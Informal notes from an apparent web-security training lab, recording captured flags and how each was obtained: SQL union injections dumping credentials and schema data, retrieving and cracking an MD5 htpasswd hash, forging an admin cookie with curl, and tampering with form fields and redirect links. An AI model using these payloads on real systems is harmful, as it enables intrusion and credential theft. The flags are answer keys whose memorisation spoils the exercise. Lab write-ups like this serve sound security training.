####################forgot password change email in form###########################
THE FLAG IS : 1D4855F7337C0C14B6F44946872C4EB33853F40B2D54393FBE94F49F1E19BBB0
Forgot password - inspect page, change email for button submut input


DB user: borntosec@localhost
DB for mrmbers: Member_Sql_Injection


#####################sign in#########################
THE FLAG IS : B3A6E43DDF8B4BBB4125E5E7D23040433827759D4DE1C04EA63907479A80A6B2
-1 union select username, password from Member_Brute_Force.db_default
find db:name and table:name
Member find: 1 AND 1=2 union select table_schema, table_name from information_schema.tables -- this is find all db:names and all table names in db
			 1 AND 1=2 union select table_name, column_name from information_schema.columns -- this is all tables and all field deepend
			 1 AND 1=2 union select table_name, column_name from information_schena.schemata where table_schema=CHAR(name of db in ASCII code) -- find someone db with all tables and fields deepend
Prog for convert char to ascii:
	arr = []
	for i in "Name schema"
		arr.append(ord(i))
	print(arr)


#####################survey table insert##################################
THE FLAG IS 03A944B434D5BAFF05F46C4BEDE5792551A2595574BCAFC9A6E25F67C382CCAA
Page: survey
just need inspect page where we have form with grade persons, after add new grade with something else count, for example 111 and send this grade


#####################admin sign in###########################################
The flag is : d19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff
Admin page:
just need open directory /whatever, in this directory have file htpasswd (autoindex on), need install this file, and take login: root, password:hash md5 (just convert, output convert == dragon), welcome 


########################search image pages####################################
THE FLAG IS f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
Searchimg page:
Again SQL INjections: we need find table_schema Member_images -> table_name: list_images -> column_name
SQL Inkection:
	1) 1 and 1=2 union select table_schema, table_name from information_schema.tables; -- we take all db names and tables names
	2) 1 and 1=2 union select table_name, column_name from information_scheam.columns where table_scheam=CHAR(77, 101, 109, 98, 101, 114, 95, 105, 109, 97, 103, 101, 115); -- we take all columns in db Member_images
	3) 1 union select comment, title from list_images; output hidden feilds for search informations, next we see comment: title=Hack me?, comment looks like -> "Take this, decode, and u find flag ;)"

######################redirect pages##########################################3
GOOD JOB HERE IS THE FLAG : B9E775A0291FED784A2D9680FCFAD7EDD6B8CDF87648DA647AAF4BBA288BCAB3
Redirect:
just need fix link in site redirect
Inspect page 192.168.99.101, sidebare, where we have redirect link to instagram, facebook and twitter, next step change link to Google for example


#####################cookie flag#########################################3
Good job! Flag : df2eb4ba34ed059a1e3e89ff4dfc13445f104a1a52295214def1c4fb1693a5c3'
Cookie flag:
	simple take cookie from request: "I_am_admin=68934a3e9455fa72420237eb05902327", decode this 68934a3e9455fa72420237eb05902327 = 'false', after it take phrase 'true' and encrypt it with md5 = "b326b5062b2f0e69046810717534cb09", after it, need send request to the server, request looks like:
	curl -v -H "Connection: close" --cookie="I_am_admin=b326b5062b2f0e69046810717534cb09" http://192.168.99.102 -o after.html
	curl http://192.168.99.102 -o before.html
	diff before.html after.html, and take the key

###################member flag##########################################
THE FLAG IS 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5
just find all fields from table users and view this:
	1) 1 union select table_name, column_name from information_schema.columns; -- find table_name: users, table_schema: Member_Sql_injection
	2) 1 union select Commentaire, countersign from users; -- after this request we see comment, which the looks like: "Decrypt this password -> then lower all the char. Sh256 on it and it's good !"


####################### ###############################################
